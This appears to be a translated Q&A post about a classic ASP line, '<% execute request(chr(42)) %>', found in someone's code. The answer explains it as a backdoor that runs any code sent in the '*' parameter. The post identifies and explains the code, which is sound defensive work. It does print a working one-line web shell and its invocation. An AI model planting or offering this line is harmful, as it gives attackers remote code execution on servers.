我遇到了一些访问Request(chr(42))(下面)并执行它的代码。
<% execute request(chr(42)) %>
我似乎无法找到'*'会返回什么,因为它似乎不是一个有效的QueryString变量名。
答案 0 :(得分:2)
在经典ASP中,您可以调用Request("some_key"),它将返回Request.Querystring(GET)或Request.Form(POST)数据的“some_key”值。
chr(42)是有效密钥,因此您可以使用test.asp?*=command调用该页面来执行某些操作。
execute是一个vbscript / asp函数,它允许您将字符串作为ASP代码执行,与eval相同。 details
更新前(不适用):
我只知道Server.Execute方法,它将执行其他一些ASP页面。
总而言之,它似乎像你建议的一样黑客/后门。